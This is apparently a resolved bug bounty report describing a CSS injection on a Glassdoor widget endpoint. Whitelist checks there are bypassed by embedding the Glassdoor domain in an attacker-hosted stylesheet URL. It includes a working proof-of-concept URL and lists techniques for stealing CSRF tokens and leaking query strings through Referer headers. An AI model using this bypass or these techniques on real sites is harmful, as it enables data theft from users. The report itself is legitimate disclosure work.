Loading HuntDB...

CSS injection via link tag whitelisted-domain bypass - https://www.glassdoor.com

Low
G
Glassdoor
Submitted None
Reported by zonduu

Vulnerability Details

Technical details and impact analysis

## Summary: It is possible load an arbitrary .css file. Bypassing the protections by adding the domain `https://www.glassdoor.com` in a parameter/path. ### Affected URL or select Asset from In-Scope: - https://www.glassdoor.com/api/widget/apiError.htm?action=employer-single-review&css=https://zonduu.me/example.css?http://www.glassdoor.com/&format=320x280&responsetype=embed&reviewid=3762318&version=1&format=320x280&responsetype=embed&reviewid=3762318&version=1 ### Affected Parameter: - css ### Browsers tested: - All ## Steps To Reproduce: - https://www.glassdoor.com/api/widget/apiError.htm?action=employer-single-review&css=https://zonduu.me/example.css?http://www.glassdoor.com/&format=320x280&responsetype=embed&reviewid=3762318&version=1&format=320x280&responsetype=embed&reviewid=3762318&version=1 It will inject `https://zonduu.me/example.css?http://www.glassdoor.com/` in the href of the second link tag. ```html <link href='https://zonduu.me/example.css?http://www.glassdoor.com/' rel='stylesheet' type='text/css' media='all' /> ``` `www.glassdoor.com` needs to be in input otherwise the server rejects it. ## Impact Description: ## Impact - Executing arbitrary JavaScript using IE's expression() function. - Using CSS selectors to read parts of the HTML source, which may include sensitive data such as anti-CSRF tokens. - Capturing any sensitive data within the URL query string by making a further style sheet import to a URL on the attacker's domain, and monitoring the incoming Referer header.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted